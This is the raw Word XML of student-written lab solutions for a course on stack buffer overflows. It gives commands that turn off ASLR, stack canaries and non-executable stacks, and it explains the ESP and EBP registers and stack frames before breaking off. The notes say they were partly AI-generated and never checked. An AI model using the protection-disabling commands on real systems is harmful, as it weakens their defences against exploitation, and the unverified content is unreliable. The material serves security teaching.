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2AD24E">
      <w:pPr>
        <w:pStyle w:val="852"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Solutions </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">LINFO2144</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> - TP7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DEFC71">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E3B84DF">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Made by students from TPs notes. Nothing has been corrected by teachers or TAs so there is no guarantee of correctness and completeness. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB5C2E2">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Generative AI has been used, be aware that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">there might be mistakes. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">At least this is still better than not having any solutions at all !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C013F29">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="nil" w:color="auto"/>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p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="833"/>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1 Environment Configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="693F925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On most Linux systems and with most compilers there are protections built in to prevent various exploits. For today's tutorial we may have to turn some of these off. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">One is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">randomisation of memory segments</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Address Space Layout Randomization (ASLR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">)by the Linux kernel. We can see the current value with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB5B53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sudo cat /proc/sys/kernel/randomize_va_space</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D5BA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To turn this off for the rest of the sessions by setting the value to "0" we can run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE974A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echo 0 | sudo tee /proc/sys/kernel/randomize_va_space</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="6292E5F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Afterwards, confirm we have turned off memory segment randomisation with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7144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sudo cat /proc/sys/kernel/randomize_va_space</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="2361CA2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compiler can also insert various protections into code that is compiled. For the stack, gcc includes some stack protection by default on many versions. We can force this to be turned off (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">remove </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack Canaries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) with the argument</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B4236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-fno-stack-protector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F42D48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At times we may also wish to force gcc to compile code with executable instructions on the stack, we can enable this with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="7260B88B">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  -z execstack</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AF17723">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7818F9B7">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="nil" w:color="auto"/>
        <w:spacing/>
        <w:ind/>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cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="0146F7BB">
      <w:pPr>
        <w:pStyle w:val="834"/>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2 Buffer Overflow on the Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="418D0AE6">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15669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21899" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId9"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="1566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23.38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14:paraId="6B38537A">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The register ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ESP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">’ is used to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00b050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">point to the next item on the stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is referred to as the ‘stack pointer’.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D66A89">
      <w:pPr>
        <w:pStyle w:val="896"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070c0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">EBP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">aka the ‘frame pointer’ serves as an unchanging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00b050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> reference point for data on the stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. This allows the program to work out how far away something in the stack is from this point. So if a variable is two ‘building blocks’ away then it is [EBP+8] as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> each</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘block’ in the stack is 4 bytes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070c0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070c0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF16FA3">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:jc w:val="center"/>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293620" cy="288036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81700" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId10"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="2293619" cy="2880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0.60pt;height:226.8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515256" cy="257937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6285" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId11"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="3515256" cy="2579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76.79pt;height:203.1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14:paraId="07A48B8E">
      <w:pPr>
        <w:pStyle w:val="896"/>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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Each function will generate its own stack frame, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">so the stack frame in the example above could be on top of another frame on the stack which is being used for another function.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC30FF8">
      <w:pPr>
        <w:pStyle w:val="896"/>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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">EBP as mentioned earlier is stored as an unchanging reference point on the stack, this is done by moving the value of ESP into EBP. We do this as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ESP will change as it always points to the top of the stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, storing it in EBP gives us an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> unchanging reference point in the stack and now the function can reference its variables and parameters on the stack from this location.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BB8CF1">
      <w:pPr>
        <w:pStyle w:val="896"/>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In this example </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">parameters </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">that have been passed to the function are stored in ‘[EBP]+8’, ‘[EBP]+12’ and ‘[EBP] +16’. So when we see ‘[EBP]+8’ that is the distance on the stack from EBP.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D762CDC">
      <w:pPr>
        <w:pStyle w:val="896"/>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rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Variables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">will be stored after the function has begun executing so these will be stored higher up the stack but in lower address space, so in this example, this will be shown as ‘[EBP]-4’.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D617231">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123478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2331" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId12"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="123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97.2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78A928B">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4900204" cy="289507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5429" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId13"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="4900204" cy="2895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5.84pt;height:227.96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0BF32B9">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>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5940425" cy="6220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46675" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId14"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="622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48.98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66BE5051">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="19345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84946" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId15"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="1934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152.32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7C242BDF">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="46117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57157" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill rotWithShape="1">
                        <a:blip r:embed="rId16"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="461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36.31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14:paraId="742C778F">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8AF2D6C">
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>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14:paraId="3012D22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A Segmentation Fault happens when a program tries to read or write to an illegal memory address. We can cause this by overflowing the buffer so much that we </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">overwrite the</w:t>
      </w:r>
      <w:r>
